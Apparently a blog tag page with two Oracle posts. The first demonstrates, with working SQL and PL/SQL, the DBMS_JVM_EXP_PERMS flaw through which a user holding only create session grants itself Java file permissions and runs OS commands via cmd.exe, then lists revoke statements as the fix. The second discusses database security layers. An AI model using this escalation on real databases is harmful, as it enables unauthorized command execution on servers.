Tag: Oracle Case Study

DBMS_JVM_EXP_PERMS OS Command Execution / Hack Oracle

Posted on by Osama Mustafa in Others
DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield, Also you need to know this way of hacking it’s only works on Windows and Oracle database version infected 10gR2,11gR1  and 11gR2.

The below demonstration explain how to use it :

SQL> CONNECT / AS SYSDBA
Connected.
SQL> CREATE USER Test IDENTIFIED BY Test;

User created.

SQL> GRANT CREATE SESSION TO Test;

Grant succeeded.

SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = ‘TEST’;

no rows selected

SQL> CONNECT Test/test
Connected.

SQL> DECLARE
   POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
   CURSOR C1 IS SELECT
‘GRANT’,’GREMLIN’,’SYS’,’java.io.FilePermission’,'<FILES>>’,’execute’,’ENABLED’ FROM DUAL; 
  BEGIN
  OPEN C1;
  FETCH C1 BULK COLLECT INTO POL;
  CLOSE C1;
  DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
  END;
  /

PL/SQL procedure successfully completed.

SQL> CONNECT / AS SYSDBA
Connected.

SQL> COL TYPE_NAME FOR A30;
SQL> COL NAME FOR A30;
SQL> COL ACTION FOR A10;
SQL> SELECT TYPE_NAME, NAME, ACTION FROM DBA_JAVA_POLICY WHERE GRANTEE = ‘TEST’;

TYPE_NAME                      NAME                           ACTION
—————————— —————————— ———-
java.io.FilePermission         <>                  execute

As you see at first User Test Only has Create Session Privileges but after using the above package he now can execute any OS Command using Java Code.

select dbms_java.runjava(‘oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

To secure your database against this :

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on “oracle/aurora/util/Wrapper” from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

Thank you
Osama Mustafa

Oracle Security Case Study

Posted on by Osama Mustafa in Others
Does your security procedure protect your data?

In most of the companies , there is access to Email Systems, Intranet , networks and internet , most of these user are using the application that connected to Database ( assume that it’s Oracle Database).

By Creating Security Procedure to protect database and what this database contain you create hard environment to deal with  since the three compentents are availability,  integrity and secuirty which mean if you increase the security then integrity will not be on the same level and so on,The Oracle database has several layers of security and provides auditing functionality at each level. most of then mention in Oracle Security Section website.

  • Password management : One of the basic steps to Enforce user to follow the rules such as : password expiration, limit password reuse, limit the number of failed logon attempts, force password complexity, lock and expire database accounts
  •     Database Auditing to monitor user activity.
  •     Fine Grained Auditing to define specific conditions necessary for an audit record to be generated, resulting in a more meaningful audit trail
  •     Database Resource Manager to set resource limits and quotas on the amount of various system resources available to users
  •     Roles to manage object privileges
  •      Oracle Label Security for more sophisticated row level security
  •     Data Encryption to provide an additional layer of protection
Which Kind Of Security Plan you follow , Do you think the Basic Steps to Secure Database will be enough or should someone enable auditing , install database firewall …. when you answer consider that more security means it will be hard to deal with application and environment.
tell me your case about the security ? what you think ?
Thank you 
Osama mustafa